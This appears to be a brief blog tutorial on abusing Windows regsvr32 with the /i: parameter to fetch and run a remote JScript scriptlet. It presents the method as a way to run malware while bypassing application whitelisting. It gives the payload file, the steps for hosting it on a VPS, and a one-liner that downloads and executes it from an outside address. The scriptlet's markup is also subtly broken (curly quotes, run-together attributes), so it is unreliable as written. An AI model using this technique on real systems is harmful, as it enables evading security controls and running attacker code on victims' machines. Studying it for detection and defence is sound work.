Hi ! , Today we will talk about running remote scripts using regsvr32,
First of all , What is regsvr32?
Regsvr32 is a command-line utility in Microsoft Windows and ReactOS for registering and unregistering DLLs.
Usage Example :
regsvr32 file.dll # registering filesregsvr32 /u file.dll # unregistering file
Using /i parameter in regsvr32, We can execute JScript or VBScript code embedded in XML ,which is used to trigger any initial installation processing.
Executing JScript or VBScript code , Means that we can execute commands to gain access using it , and our malware will run under regsvr32 process with bypassing application whitelisting.
Let’s Start!
We will use calc.exe as the program that will be executed , and using process hacker for viewing the process.
let’s save our payload into .csc file extension
<?XML version=”1.0"?><scriptlet><registrationprogid=”Pentest”classid=”{10001111–0000–0000–0000–0000FEEDACDC}” ><script language=”JScript”>![CDATA[var r = new ActiveXObject(“WScript.Shell”).Run(“calc.exe”);]]></script></registration></scriptlet>
and save it into our VPS.
Then , we can run python3 simple http server using
python3 -m http.server 80
ِAfter running the server , we will use this command to run our payload
regsvr32.exe /s /i:http://10.10.10.10/payload.sct scrobj.dll
and We Are Done!